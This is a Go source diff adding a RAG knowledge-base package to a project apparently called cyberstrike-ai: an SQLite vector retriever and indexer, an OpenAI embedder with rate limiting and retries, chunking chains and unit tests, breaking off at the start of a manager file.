r := NewRetriever(nil, nil, &RetrievalConfig{TopK: 3, SimilarityThreshold: 0.5}, zap.NewNop())
_, err := BuildKnowledgeRetrieveChain(context.Background(), r)
if err != nil {
t.Fatal(err)
}
}
func TestBuildKnowledgeRetrieveChain_NilRetriever(t *testing.T) {
_, err := BuildKnowledgeRetrieveChain(context.Background(), nil)
if err == nil {
t.Fatal("expected error for nil retriever")
}
}
+202
View File
@@ -0,0 +1,202 @@
package knowledge
import (
"context"
"fmt"
"strings"
"cyberstrike-ai/internal/config"
"github.com/cloudwego/eino/callbacks"
"github.com/cloudwego/eino/components"
"github.com/cloudwego/eino/components/retriever"
"github.com/cloudwego/eino/schema"
"go.uber.org/zap"
)
// VectorEinoRetriever implements [retriever.Retriever] on top of SQLite-stored embeddings + cosine similarity.
//
// Options:
// - [retriever.WithTopK]
// - [retriever.WithDSLInfo] with [DSLRiskType] (string), [DSLSimilarityThreshold] (float, cosine 01), [DSLSubIndexFilter] (string)
//
// Document scores are cosine similarity; [retriever.WithScoreThreshold] is not mapped to a different metric.
//
// After vector search: optional [DocumentReranker] (see [Retriever.SetDocumentReranker]), then
// [ApplyPostRetrieve] (normalized-text dedupe, context budget, final Top-K) using [config.PostRetrieveConfig].
type VectorEinoRetriever struct {
inner *Retriever
}
// NewVectorEinoRetriever wraps r for Eino compose / tooling.
func NewVectorEinoRetriever(r *Retriever) *VectorEinoRetriever {
if r == nil {
return nil
}
return &VectorEinoRetriever{inner: r}
}
// GetType identifies this retriever for Eino callbacks.
func (h *VectorEinoRetriever) GetType() string {
return "SQLiteVectorKnowledgeRetriever"
}
// Retrieve runs vector search and returns [schema.Document] rows.
func (h *VectorEinoRetriever) Retrieve(ctx context.Context, query string, opts ...retriever.Option) (out []*schema.Document, err error) {
if h == nil || h.inner == nil {
return nil, fmt.Errorf("VectorEinoRetriever: nil retriever")
}
q := strings.TrimSpace(query)
if q == "" {
return nil, fmt.Errorf("查询不能为空")
}
ro := retriever.GetCommonOptions(nil, opts...)
cfg := h.inner.config
req := &SearchRequest{Query: q}
if ro.TopK != nil && *ro.TopK > 0 {
req.TopK = *ro.TopK
} else if cfg != nil && cfg.TopK > 0 {
req.TopK = cfg.TopK
} else {
req.TopK = 5
}
req.Threshold = 0
if ro.DSLInfo != nil {
if rt, ok := ro.DSLInfo[DSLRiskType].(string); ok {
req.RiskType = strings.TrimSpace(rt)
}
if v, ok := ro.DSLInfo[DSLSimilarityThreshold]; ok {
if f, ok2 := DSLNumeric(v); ok2 && f > 0 {
req.Threshold = f
}
}
if sf, ok := ro.DSLInfo[DSLSubIndexFilter].(string); ok {
req.SubIndexFilter = strings.TrimSpace(sf)
}
}
if req.SubIndexFilter == "" && cfg != nil && strings.TrimSpace(cfg.SubIndexFilter) != "" {
req.SubIndexFilter = strings.TrimSpace(cfg.SubIndexFilter)
}
if req.Threshold <= 0 && cfg != nil && cfg.SimilarityThreshold > 0 {
req.Threshold = cfg.SimilarityThreshold
}
if req.Threshold <= 0 {
req.Threshold = 0.7
}
finalTopK := req.TopK
var postPO *config.PostRetrieveConfig
if cfg != nil {
postPO = &cfg.PostRetrieve
}
fetchK := EffectivePrefetchTopK(finalTopK, postPO)
searchReq := *req
searchReq.TopK = fetchK
ctx = callbacks.EnsureRunInfo(ctx, h.GetType(), components.ComponentOfRetriever)
th := req.Threshold
st := &th
ctx = callbacks.OnStart(ctx, &retriever.CallbackInput{
Query: q,
TopK: finalTopK,
ScoreThreshold: st,
Extra: ro.DSLInfo,
})
defer func() {
if err != nil {
_ = callbacks.OnError(ctx, err)
return
}
_ = callbacks.OnEnd(ctx, &retriever.CallbackOutput{Docs: out})
}()
results, err := h.inner.vectorSearch(ctx, &searchReq)
if err != nil {
return nil, err
}
out = retrievalResultsToDocuments(results)
if rr := h.inner.documentReranker(); rr != nil && len(out) > 1 {
reranked, rerr := rr.Rerank(ctx, q, out)
if rerr != nil {
if h.inner.logger != nil {
h.inner.logger.Warn("知识检索重排失败,已使用向量序", zap.Error(rerr))
}
} else if len(reranked) > 0 {
out = reranked
}
}
tokenModel := ""
if h.inner.embedder != nil {
tokenModel = h.inner.embedder.EmbeddingModelName()
}
out, err = ApplyPostRetrieve(out, postPO, tokenModel, finalTopK)
if err != nil {
return nil, err
}
return out, nil
}
func retrievalResultsToDocuments(results []*RetrievalResult) []*schema.Document {
out := make([]*schema.Document, 0, len(results))
for _, res := range results {
if res == nil || res.Chunk == nil || res.Item == nil {
continue
}
d := &schema.Document{
ID: res.Chunk.ID,
Content: res.Chunk.ChunkText,
MetaData: map[string]any{
metaKBItemID: res.Item.ID,
metaKBCategory: res.Item.Category,
metaKBTitle: res.Item.Title,
metaKBChunkIndex: res.Chunk.ChunkIndex,
metaSimilarity: res.Similarity,
},
}
d.WithScore(res.Score)
out = append(out, d)
}
return out
}
func documentsToRetrievalResults(docs []*schema.Document) ([]*RetrievalResult, error) {
out := make([]*RetrievalResult, 0, len(docs))
for i, d := range docs {
if d == nil {
continue
}
itemID, err := RequireMetaString(d.MetaData, metaKBItemID)
if err != nil {
return nil, fmt.Errorf("document %d: %w", i, err)
}
cat := MetaLookupString(d.MetaData, metaKBCategory)
title := MetaLookupString(d.MetaData, metaKBTitle)
chunkIdx, err := RequireMetaInt(d.MetaData, metaKBChunkIndex)
if err != nil {
return nil, fmt.Errorf("document %d: %w", i, err)
}
sim, _ := MetaFloat64OK(d.MetaData, metaSimilarity)
item := &KnowledgeItem{ID: itemID, Category: cat, Title: title}
chunk := &KnowledgeChunk{
ID: d.ID,
ItemID: itemID,
ChunkIndex: chunkIdx,
ChunkText: d.Content,
}
out = append(out, &RetrievalResult{
Chunk: chunk,
Item: item,
Similarity: sim,
Score: d.Score(),
})
}
return out, nil
}
var _ retriever.Retriever = (*VectorEinoRetriever)(nil)
+142
View File
@@ -0,0 +1,142 @@
package knowledge
import (
"context"
"database/sql"
"encoding/json"
"fmt"
"strings"
"github.com/cloudwego/eino/callbacks"
"github.com/cloudwego/eino/components"
"github.com/cloudwego/eino/components/indexer"
"github.com/cloudwego/eino/schema"
"github.com/google/uuid"
)
// SQLiteIndexer implements [indexer.Indexer] against knowledge_embeddings + existing schema.
type SQLiteIndexer struct {
db *sql.DB
batchSize int
embeddingModel string
}
// NewSQLiteIndexer returns an indexer that writes chunk rows for one knowledge item per Store call.
// batchSize is the embedding batch size; if <= 0, default 64 is used.
// embeddingModel is persisted per row for retrieval-time consistency checks (may be empty).
func NewSQLiteIndexer(db *sql.DB, batchSize int, embeddingModel string) *SQLiteIndexer {
return &SQLiteIndexer{db: db, batchSize: batchSize, embeddingModel: strings.TrimSpace(embeddingModel)}
}
// GetType implements eino callback run info.
func (s *SQLiteIndexer) GetType() string {
return "SQLiteKnowledgeIndexer"
}
// Store embeds documents and inserts rows. Each doc must carry MetaData:
// kb_item_id, kb_category, kb_title, kb_chunk_index (int). Content is chunk text only.
func (s *SQLiteIndexer) Store(ctx context.Context, docs []*schema.Document, opts ...indexer.Option) (ids []string, err error) {
options := indexer.GetCommonOptions(nil, opts...)
if options.Embedding == nil {
return nil, fmt.Errorf("sqlite indexer: embedding is required")
}
if len(docs) == 0 {
return nil, nil
}
ctx = callbacks.EnsureRunInfo(ctx, s.GetType(), components.ComponentOfIndexer)
ctx = callbacks.OnStart(ctx, &indexer.CallbackInput{Docs: docs})
defer func() {
if err != nil {
_ = callbacks.OnError(ctx, err)
return
}
_ = callbacks.OnEnd(ctx, &indexer.CallbackOutput{IDs: ids})
}()
subIdxStr := strings.Join(options.SubIndexes, ",")
texts := make([]string, len(docs))
for i, d := range docs {
if d == nil {
return nil, fmt.Errorf("sqlite indexer: nil document at %d", i)
}
cat := MetaLookupString(d.MetaData, metaKBCategory)
title := MetaLookupString(d.MetaData, metaKBTitle)
texts[i] = FormatEmbeddingInput(cat, title, d.Content)
}
bs := s.batchSize
if bs <= 0 {
bs = 64
}
var allVecs [][]float64
for start := 0; start < len(texts); start += bs {
end := start + bs
if end > len(texts) {
end = len(texts)
}
batch := texts[start:end]
vecs, embedErr := options.Embedding.EmbedStrings(ctx, batch)
if embedErr != nil {
return nil, fmt.Errorf("sqlite indexer: embed batch %d-%d: %w", start, end, embedErr)
}
if len(vecs) != len(batch) {
return nil, fmt.Errorf("sqlite indexer: embed count mismatch: got %d want %d", len(vecs), len(batch))
}
allVecs = append(allVecs, vecs...)
}
embedDim := 0
if len(allVecs) > 0 {
embedDim = len(allVecs[0])
}
tx, err := s.db.BeginTx(ctx, nil)
if err != nil {
return nil, fmt.Errorf("sqlite indexer: begin tx: %w", err)
}
defer tx.Rollback()
ids = make([]string, 0, len(docs))
for i, d := range docs {
chunkID := uuid.New().String()
itemID, metaErr := RequireMetaString(d.MetaData, metaKBItemID)
if metaErr != nil {
return nil, fmt.Errorf("sqlite indexer: doc %d: %w", i, metaErr)
}
chunkIdx, metaErr := RequireMetaInt(d.MetaData, metaKBChunkIndex)
if metaErr != nil {
return nil, fmt.Errorf("sqlite indexer: doc %d: %w", i, metaErr)
}
vec := allVecs[i]
if embedDim > 0 && len(vec) != embedDim {
return nil, fmt.Errorf("sqlite indexer: inconsistent embedding dim at doc %d: got %d want %d", i, len(vec), embedDim)
}
vec32 := make([]float32, len(vec))
for j, v := range vec {
vec32[j] = float32(v)
}
embeddingJSON, jsonErr := json.Marshal(vec32)
if jsonErr != nil {
return nil, fmt.Errorf("sqlite indexer: marshal embedding: %w", jsonErr)
}
_, err = tx.ExecContext(ctx,
`INSERT INTO knowledge_embeddings (id, item_id, chunk_index, chunk_text, embedding, sub_indexes, embedding_model, embedding_dim, created_at)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, datetime('now'))`,
chunkID, itemID, chunkIdx, d.Content, string(embeddingJSON), subIdxStr, s.embeddingModel, embedDim,
)
if err != nil {
return nil, fmt.Errorf("sqlite indexer: insert chunk %d: %w", i, err)
}
ids = append(ids, chunkID)
}
if err := tx.Commit(); err != nil {
return nil, fmt.Errorf("sqlite indexer: commit: %w", err)
}
return ids, nil
}
var _ indexer.Indexer = (*SQLiteIndexer)(nil)
+251
View File
@@ -0,0 +1,251 @@
package knowledge
import (
"context"
"fmt"
"net/http"
"strings"
"sync"
"time"
"cyberstrike-ai/internal/config"
einoembedopenai "github.com/cloudwego/eino-ext/components/embedding/openai"
"github.com/cloudwego/eino/components/embedding"
"go.uber.org/zap"
"golang.org/x/time/rate"
)
// Embedder 使用 CloudWeGo Eino 的 OpenAI Embedding 组件,并保留速率限制与重试。
type Embedder struct {
eino embedding.Embedder
config *config.KnowledgeConfig
logger *zap.Logger
rateLimiter *rate.Limiter
rateLimitDelay time.Duration
maxRetries int
retryDelay time.Duration
mu sync.Mutex
}
// NewEmbedder 基于 Eino eino-ext OpenAI EmbedderopenAIConfig 用于在知识库未单独配置 key 时回退 API Key。
func NewEmbedder(ctx context.Context, cfg *config.KnowledgeConfig, openAIConfig *config.OpenAIConfig, logger *zap.Logger) (*Embedder, error) {
if cfg == nil {
return nil, fmt.Errorf("knowledge config is nil")
}
var rateLimiter *rate.Limiter
var rateLimitDelay time.Duration
if cfg.Indexing.MaxRPM > 0 {
rpm := cfg.Indexing.MaxRPM
rateLimiter = rate.NewLimiter(rate.Every(time.Minute/time.Duration(rpm)), rpm)
if logger != nil {
logger.Info("知识库索引速率限制已启用", zap.Int("maxRPM", rpm))
}
} else if cfg.Indexing.RateLimitDelayMs > 0 {
rateLimitDelay = time.Duration(cfg.Indexing.RateLimitDelayMs) * time.Millisecond
if logger != nil {
logger.Info("知识库索引固定延迟已启用", zap.Duration("delay", rateLimitDelay))
}
}
maxRetries := 3
retryDelay := 1000 * time.Millisecond
if cfg.Indexing.MaxRetries > 0 {
maxRetries = cfg.Indexing.MaxRetries
}
if cfg.Indexing.RetryDelayMs > 0 {
retryDelay = time.Duration(cfg.Indexing.RetryDelayMs) * time.Millisecond
}
model := strings.TrimSpace(cfg.Embedding.Model)
if model == "" {
model = "text-embedding-3-small"
}
baseURL := strings.TrimSpace(cfg.Embedding.BaseURL)
baseURL = strings.TrimSuffix(baseURL, "/")
if baseURL == "" {
baseURL = "https://api.openai.com/v1"
}
apiKey := strings.TrimSpace(cfg.Embedding.APIKey)
if apiKey == "" && openAIConfig != nil {
apiKey = strings.TrimSpace(openAIConfig.APIKey)
}
if apiKey == "" {
return nil, fmt.Errorf("embedding API key 未配置")
}
timeout := 120 * time.Second
if cfg.Indexing.RequestTimeoutSeconds > 0 {
timeout = time.Duration(cfg.Indexing.RequestTimeoutSeconds) * time.Second
}
httpClient := &http.Client{Timeout: timeout}
inner, err := einoembedopenai.NewEmbedder(ctx, &einoembedopenai.EmbeddingConfig{
APIKey: apiKey,
BaseURL: baseURL,
ByAzure: false,
Model: model,
HTTPClient: httpClient,
})
if err != nil {
return nil, fmt.Errorf("eino OpenAI embedder: %w", err)
}
return &Embedder{
eino: inner,
config: cfg,
logger: logger,
rateLimiter: rateLimiter,
rateLimitDelay: rateLimitDelay,
maxRetries: maxRetries,
retryDelay: retryDelay,
}, nil
}
// EmbeddingModelName 返回配置的嵌入模型名(用于 tiktoken 分块与向量行元数据)。
func (e *Embedder) EmbeddingModelName() string {
if e == nil || e.config == nil {
return ""
}
s := strings.TrimSpace(e.config.Embedding.Model)
if s != "" {
return s
}
return "text-embedding-3-small"
}
func (e *Embedder) waitRateLimiter() {
e.mu.Lock()
defer e.mu.Unlock()
if e.rateLimiter != nil {
ctx := context.Background()
if err := e.rateLimiter.Wait(ctx); err != nil && e.logger != nil {
e.logger.Warn("速率限制器等待失败", zap.Error(err))
}
}
if e.rateLimitDelay > 0 {
time.Sleep(e.rateLimitDelay)
}
}
// EmbedText 单条嵌入(float32,与历史存储格式一致)。
func (e *Embedder) EmbedText(ctx context.Context, text string) ([]float32, error) {
vecs, err := e.EmbedStrings(ctx, []string{text})
if err != nil {
return nil, err
}
if len(vecs) != 1 {
return nil, fmt.Errorf("unexpected embedding count: %d", len(vecs))
}
return vecs[0], nil
}
// EmbedStrings 批量嵌入,带重试;实现 [embedding.Embedder],可供 Eino Indexer 使用。
func (e *Embedder) EmbedStrings(ctx context.Context, texts []string, opts ...embedding.Option) ([][]float32, error) {
if e == nil || e.eino == nil {
return nil, fmt.Errorf("embedder not initialized")
}
if len(texts) == 0 {
return nil, nil
}
var lastErr error
for attempt := 0; attempt < e.maxRetries; attempt++ {
if attempt > 0 {
wait := e.retryDelay * time.Duration(attempt)
if e.logger != nil {
e.logger.Debug("嵌入重试前等待", zap.Int("attempt", attempt+1), zap.Duration("wait", wait))
}
select {
case <-ctx.Done():
return nil, ctx.Err()
case <-time.After(wait):
}
} else {
e.waitRateLimiter()
}
raw, err := e.eino.EmbedStrings(ctx, texts, opts...)
if err == nil {
out := make([][]float32, len(raw))
for i, row := range raw {
out[i] = make([]float32, len(row))
for j, v := range row {
out[i][j] = float32(v)
}
}
return out, nil
}
lastErr = err
if !e.isRetryableError(err) {
return nil, err
}
if e.logger != nil {
e.logger.Debug("嵌入失败,将重试", zap.Int("attempt", attempt+1), zap.Error(err))
}
}
return nil, fmt.Errorf("达到最大重试次数 (%d): %v", e.maxRetries, lastErr)
}
// EmbedTexts 批量 float32 嵌入(兼容旧调用;单次请求批量以减小延迟)。
func (e *Embedder) EmbedTexts(ctx context.Context, texts []string) ([][]float32, error) {
return e.EmbedStrings(ctx, texts)
}
func (e *Embedder) isRetryableError(err error) bool {
if err == nil {
return false
}
errStr := err.Error()
if strings.Contains(errStr, "429") || strings.Contains(errStr, "rate limit") {
return true
}
if strings.Contains(errStr, "500") || strings.Contains(errStr, "502") ||
strings.Contains(errStr, "503") || strings.Contains(errStr, "504") {
return true
}
if strings.Contains(errStr, "timeout") || strings.Contains(errStr, "connection") ||
strings.Contains(errStr, "network") || strings.Contains(errStr, "EOF") {
return true
}
return false
}
// einoFloatEmbedder adapts [][]float32 embedder to Eino's [][]float64 [embedding.Embedder] for Indexer.Store.
type einoFloatEmbedder struct {
inner *Embedder
}
func (w *einoFloatEmbedder) EmbedStrings(ctx context.Context, texts []string, opts ...embedding.Option) ([][]float64, error) {
vec32, err := w.inner.EmbedStrings(ctx, texts, opts...)
if err != nil {
return nil, err
}
out := make([][]float64, len(vec32))
for i, row := range vec32 {
out[i] = make([]float64, len(row))
for j, v := range row {
out[i][j] = float64(v)
}
}
return out, nil
}
func (w *einoFloatEmbedder) GetType() string {
return "CyberStrikeKnowledgeEmbedder"
}
func (w *einoFloatEmbedder) IsCallbacksEnabled() bool {
return false
}
// EinoEmbeddingComponent returns an [embedding.Embedder] that uses the same retry/rate-limit path
// and produces float64 vectors expected by generic Eino indexer helpers.
func (e *Embedder) EinoEmbeddingComponent() embedding.Embedder {
return &einoFloatEmbedder{inner: e}
}
+91
View File
@@ -0,0 +1,91 @@
package knowledge
import (
"context"
"database/sql"
"fmt"
"strings"
"cyberstrike-ai/internal/config"
"github.com/cloudwego/eino/components/document"
"github.com/cloudwego/eino/compose"
"github.com/cloudwego/eino/schema"
)
// normalizeChunkStrategy returns "recursive" or "markdown_then_recursive".
func normalizeChunkStrategy(s string) string {
v := strings.TrimSpace(strings.ToLower(s))
switch v {
case "recursive":
return "recursive"
case "markdown_then_recursive", "markdown_recursive", "markdown":
return "markdown_then_recursive"
case "":
return "markdown_then_recursive"
default:
return "markdown_then_recursive"
}
}
func buildKnowledgeIndexChain(
ctx context.Context,
indexingCfg *config.IndexingConfig,
db *sql.DB,
recursive document.Transformer,
embeddingModel string,
) (compose.Runnable[[]*schema.Document, []string], error) {
if recursive == nil {
return nil, fmt.Errorf("recursive transformer is nil")
}
if db == nil {
return nil, fmt.Errorf("db is nil")
}
strategy := normalizeChunkStrategy("markdown_then_recursive")
batch := 64
maxChunks := 0
if indexingCfg != nil {
strategy = normalizeChunkStrategy(indexingCfg.ChunkStrategy)
if indexingCfg.BatchSize > 0 {
batch = indexingCfg.BatchSize
}
maxChunks = indexingCfg.MaxChunksPerItem
}
si := NewSQLiteIndexer(db, batch, embeddingModel)
ch := compose.NewChain[[]*schema.Document, []string]()
if strategy != "recursive" {
md, err := newMarkdownHeaderSplitter(ctx)
if err != nil {
return nil, fmt.Errorf("markdown splitter: %w", err)
}
ch.AppendDocumentTransformer(md)
}
ch.AppendDocumentTransformer(recursive)
ch.AppendLambda(newChunkEnrichLambda(maxChunks))
ch.AppendIndexer(si)
return ch.Compile(ctx)
}
func newChunkEnrichLambda(maxChunks int) *compose.Lambda {
return compose.InvokableLambda(func(ctx context.Context, docs []*schema.Document) ([]*schema.Document, error) {
_ = ctx
out := make([]*schema.Document, 0, len(docs))
for _, d := range docs {
if d == nil || strings.TrimSpace(d.Content) == "" {
continue
}
out = append(out, d)
}
if maxChunks > 0 && len(out) > maxChunks {
out = out[:maxChunks]
}
for i, d := range out {
if d.MetaData == nil {
d.MetaData = make(map[string]any)
}
d.MetaData[metaKBChunkIndex] = i
}
return out, nil
})
}
+21
View File
@@ -0,0 +1,21 @@
package knowledge
import "testing"
func TestNormalizeChunkStrategy(t *testing.T) {
cases := []struct {
in, want string
}{
{"", "markdown_then_recursive"},
{"recursive", "recursive"},
{"RECURSIVE", "recursive"},
{"markdown_then_recursive", "markdown_then_recursive"},
{"markdown", "markdown_then_recursive"},
{"unknown", "markdown_then_recursive"},
}
for _, tc := range cases {
if got := normalizeChunkStrategy(tc.in); got != tc.want {
t.Errorf("normalizeChunkStrategy(%q) = %q, want %q", tc.in, got, tc.want)
}
}
}
+352
View File
@@ -0,0 +1,352 @@
package knowledge
import (
"context"
"database/sql"
"fmt"
"strings"
"sync"
"time"
"cyberstrike-ai/internal/config"
fileloader "github.com/cloudwego/eino-ext/components/document/loader/file"
"github.com/cloudwego/eino/components/document"
"github.com/cloudwego/eino/components/indexer"
"github.com/cloudwego/eino/compose"
"github.com/cloudwego/eino/schema"
"go.uber.org/zap"
)
// Indexer 使用 Eino Compose 索引链(Markdown/递归分块、Lambda enrich、SQLite 索引)与嵌入写入。
type Indexer struct {
db *sql.DB
embedder *Embedder
logger *zap.Logger
chunkSize int
overlap int
indexingCfg *config.IndexingConfig
indexChain compose.Runnable[[]*schema.Document, []string]
fileLoader *fileloader.FileLoader
mu sync.RWMutex
lastError string
lastErrorTime time.Time
errorCount int
rebuildMu sync.RWMutex
isRebuilding bool
rebuildTotalItems int
rebuildCurrent int
rebuildFailed int
rebuildStartTime time.Time
rebuildLastItemID string
rebuildLastChunks int
}
// NewIndexer 创建索引器并编译 Eino 索引链;kcfg 为完整知识库配置(含 indexing 与路径相关行为)。
func NewIndexer(ctx context.Context, db *sql.DB, embedder *Embedder, logger *zap.Logger, kcfg *config.KnowledgeConfig) (*Indexer, error) {
if db == nil {
return nil, fmt.Errorf("db is nil")
}
if embedder == nil {
return nil, fmt.Errorf("embedder is nil")
}
if err := EnsureKnowledgeEmbeddingsSchema(db); err != nil {
return nil, fmt.Errorf("knowledge_embeddings 结构迁移: %w", err)
}
if kcfg == nil {
kcfg = &config.KnowledgeConfig{}
}
indexingCfg := &kcfg.Indexing
chunkSize := 512
overlap := 50
if indexingCfg.ChunkSize > 0 {
chunkSize = indexingCfg.ChunkSize
}
if indexingCfg.ChunkOverlap >= 0 {
overlap = indexingCfg.ChunkOverlap
}
embedModel := embedder.EmbeddingModelName()
splitter, err := newKnowledgeSplitter(chunkSize, overlap, embedModel)
if err != nil {
return nil, fmt.Errorf("eino recursive splitter: %w", err)
}
chain, err := buildKnowledgeIndexChain(ctx, indexingCfg, db, splitter, embedModel)
if err != nil {
return nil, fmt.Errorf("knowledge index chain: %w", err)
}
var fl *fileloader.FileLoader
fl, err = fileloader.NewFileLoader(ctx, nil)
if err != nil {
if logger != nil {
logger.Warn("Eino FileLoader 初始化失败,prefer_source_file 将回退数据库正文", zap.Error(err))
}
fl = nil
err = nil
}
return &Indexer{
db: db,
embedder: embedder,
logger: logger,
chunkSize: chunkSize,
overlap: overlap,
indexingCfg: indexingCfg,
indexChain: chain,
fileLoader: fl,
}, nil
}
// RecompileIndexChain 在配置或嵌入模型变更后重建 Eino 索引链(无需重启进程)。
func (idx *Indexer) RecompileIndexChain(ctx context.Context) error {
if idx == nil || idx.db == nil || idx.embedder == nil {
return fmt.Errorf("indexer 未初始化")
}
if err := EnsureKnowledgeEmbeddingsSchema(idx.db); err != nil {
return err
}
embedModel := idx.embedder.EmbeddingModelName()
splitter, err := newKnowledgeSplitter(idx.chunkSize, idx.overlap, embedModel)
if err != nil {
return fmt.Errorf("eino recursive splitter: %w", err)
}
chain, err := buildKnowledgeIndexChain(ctx, idx.indexingCfg, idx.db, splitter, embedModel)
if err != nil {
return fmt.Errorf("knowledge index chain: %w", err)
}
idx.indexChain = chain
return nil
}
// IndexItem 索引单个知识项:先清空旧向量,再走 Compose 链(分块、嵌入、写入)。
func (idx *Indexer) IndexItem(ctx context.Context, itemID string) error {
if idx.indexChain == nil {
return fmt.Errorf("索引链未初始化")
}
if idx.embedder == nil {
return fmt.Errorf("嵌入器未初始化")
}
var content, category, title, filePath string
err := idx.db.QueryRow("SELECT content, category, title, file_path FROM knowledge_base_items WHERE id = ?", itemID).Scan(&content, &category, &title, &filePath)
if err != nil {
return fmt.Errorf("获取知识项失败:%w", err)
}
if _, err := idx.db.Exec("DELETE FROM knowledge_embeddings WHERE item_id = ?", itemID); err != nil {
return fmt.Errorf("删除旧向量失败:%w", err)
}
body := strings.TrimSpace(content)
if idx.indexingCfg != nil && idx.indexingCfg.PreferSourceFile && strings.TrimSpace(filePath) != "" && idx.fileLoader != nil {
docs, lerr := idx.fileLoader.Load(ctx, document.Source{URI: strings.TrimSpace(filePath)})
if lerr == nil && len(docs) > 0 {
var b strings.Builder
for i, d := range docs {
if d == nil {
continue
}
if i > 0 {
b.WriteString("\n\n")
}
b.WriteString(d.Content)
}
if s := strings.TrimSpace(b.String()); s != "" {
body = s
}
} else if idx.logger != nil {
idx.logger.Warn("优先源文件读取失败,使用数据库正文",
zap.String("itemId", itemID),
zap.String("path", filePath),
zap.Error(lerr))
}
}
root := &schema.Document{
ID: itemID,
Content: body,
MetaData: map[string]any{
metaKBCategory: category,
metaKBTitle: title,
metaKBItemID: itemID,
},
}
idxOpts := []indexer.Option{indexer.WithEmbedding(idx.embedder.EinoEmbeddingComponent())}
if idx.indexingCfg != nil && len(idx.indexingCfg.SubIndexes) > 0 {
idxOpts = append(idxOpts, indexer.WithSubIndexes(idx.indexingCfg.SubIndexes))
}
ids, err := idx.indexChain.Invoke(ctx, []*schema.Document{root}, compose.WithIndexerOption(idxOpts...))
if err != nil {
msg := fmt.Sprintf("索引写入失败 (知识项:%s): %v", itemID, err)
idx.mu.Lock()
idx.lastError = msg
idx.lastErrorTime = time.Now()
idx.mu.Unlock()
return err
}
if idx.logger != nil {
idx.logger.Info("知识项索引完成", zap.String("itemId", itemID), zap.Int("chunks", len(ids)))
}
idx.rebuildMu.Lock()
idx.rebuildLastItemID = itemID
idx.rebuildLastChunks = len(ids)
idx.rebuildMu.Unlock()
return nil
}
// HasIndex 检查是否存在索引
func (idx *Indexer) HasIndex() (bool, error) {
var count int
err := idx.db.QueryRow("SELECT COUNT(*) FROM knowledge_embeddings").Scan(&count)
if err != nil {
return false, fmt.Errorf("检查索引失败:%w", err)
}
return count > 0, nil
}
// RebuildIndex 重建所有索引
func (idx *Indexer) RebuildIndex(ctx context.Context) error {
idx.rebuildMu.Lock()
idx.isRebuilding = true
idx.rebuildTotalItems = 0
idx.rebuildCurrent = 0
idx.rebuildFailed = 0
idx.rebuildStartTime = time.Now()
idx.rebuildLastItemID = ""
idx.rebuildLastChunks = 0
idx.rebuildMu.Unlock()
idx.mu.Lock()
idx.lastError = ""
idx.lastErrorTime = time.Time{}
idx.errorCount = 0
idx.mu.Unlock()
rows, err := idx.db.Query("SELECT id FROM knowledge_base_items")
if err != nil {
idx.rebuildMu.Lock()
idx.isRebuilding = false
idx.rebuildMu.Unlock()
return fmt.Errorf("查询知识项失败:%w", err)
}
defer rows.Close()
var itemIDs []string
for rows.Next() {
var id string
if err := rows.Scan(&id); err != nil {
idx.rebuildMu.Lock()
idx.isRebuilding = false
idx.rebuildMu.Unlock()
return fmt.Errorf("扫描知识项 ID 失败:%w", err)
}
itemIDs = append(itemIDs, id)
}
idx.rebuildMu.Lock()
idx.rebuildTotalItems = len(itemIDs)
idx.rebuildMu.Unlock()
idx.logger.Info("开始重建索引", zap.Int("totalItems", len(itemIDs)))
failedCount := 0
consecutiveFailures := 0
maxConsecutiveFailures := 5
firstFailureItemID := ""
var firstFailureError error
for i, itemID := range itemIDs {
if err := idx.IndexItem(ctx, itemID); err != nil {
failedCount++
consecutiveFailures++
if consecutiveFailures == 1 {
firstFailureItemID = itemID
firstFailureError = err
idx.logger.Warn("索引知识项失败",
zap.String("itemId", itemID),
zap.Int("totalItems", len(itemIDs)),
zap.Error(err),
)
}
if consecutiveFailures >= maxConsecutiveFailures {
errorMsg := fmt.Sprintf("连续 %d 个知识项索引失败,可能存在配置问题(如嵌入模型配置错误、API 密钥无效、余额不足等)。第一个失败项:%s, 错误:%v", consecutiveFailures, firstFailureItemID, firstFailureError)
idx.mu.Lock()
idx.lastError = errorMsg
idx.lastErrorTime = time.Now()
idx.mu.Unlock()
idx.logger.Error("连续索引失败次数过多,立即停止索引",
zap.Int("consecutiveFailures", consecutiveFailures),
zap.Int("totalItems", len(itemIDs)),
zap.Int("processedItems", i+1),
zap.String("firstFailureItemId", firstFailureItemID),
zap.Error(firstFailureError),
)
return fmt.Errorf("连续索引失败次数过多:%v", firstFailureError)
}
if failedCount > len(itemIDs)*3/10 && failedCount == len(itemIDs)*3/10+1 {
errorMsg := fmt.Sprintf("索引失败的知识项过多 (%d/%d),可能存在配置问题。第一个失败项:%s, 错误:%v", failedCount, len(itemIDs), firstFailureItemID, firstFailureError)
idx.mu.Lock()
idx.lastError = errorMsg
idx.lastErrorTime = time.Now()
idx.mu.Unlock()
idx.logger.Error("索引失败的知识项过多,可能存在配置问题",
zap.Int("failedCount", failedCount),
zap.Int("totalItems", len(itemIDs)),
zap.String("firstFailureItemId", firstFailureItemID),
zap.Error(firstFailureError),
)
}
continue
}
if consecutiveFailures > 0 {
consecutiveFailures = 0
firstFailureItemID = ""
firstFailureError = nil
}
idx.rebuildMu.Lock()
idx.rebuildCurrent = i + 1
idx.rebuildFailed = failedCount
idx.rebuildMu.Unlock()
if (i+1)%10 == 0 || (len(itemIDs) > 0 && (i+1)*100/len(itemIDs)%10 == 0 && (i+1)*100/len(itemIDs) > 0) {
idx.logger.Info("索引进度", zap.Int("current", i+1), zap.Int("total", len(itemIDs)), zap.Int("failed", failedCount))
}
}
idx.rebuildMu.Lock()
idx.isRebuilding = false
idx.rebuildMu.Unlock()
idx.logger.Info("索引重建完成", zap.Int("totalItems", len(itemIDs)), zap.Int("failedCount", failedCount))
return nil
}
// GetLastError 获取最近一次错误信息
func (idx *Indexer) GetLastError() (string, time.Time) {
idx.mu.RLock()
defer idx.mu.RUnlock()
return idx.lastError, idx.lastErrorTime
}
// GetRebuildStatus 获取重建索引状态
func (idx *Indexer) GetRebuildStatus() (isRebuilding bool, totalItems int, current int, failed int, lastItemID string, lastChunks int, startTime time.Time) {
idx.rebuildMu.RLock()
defer idx.rebuildMu.RUnlock()
return idx.isRebuilding, idx.rebuildTotalItems, idx.rebuildCurrent, idx.rebuildFailed, idx.rebuildLastItemID, idx.rebuildLastChunks, idx.rebuildStartTime
}
+885
View File
@@ -0,0 +1,885 @@
package knowledge
import (
"database/sql"
"encoding/json"
"fmt"
"io/fs"
"os"
"path/filepath"
"strings"
"time"
"github.com/google/uuid"
"go.uber.org/zap"
)
// Manager 知识库管理器
type Manager struct {
db *sql.DB
basePath string
logger *zap.Logger
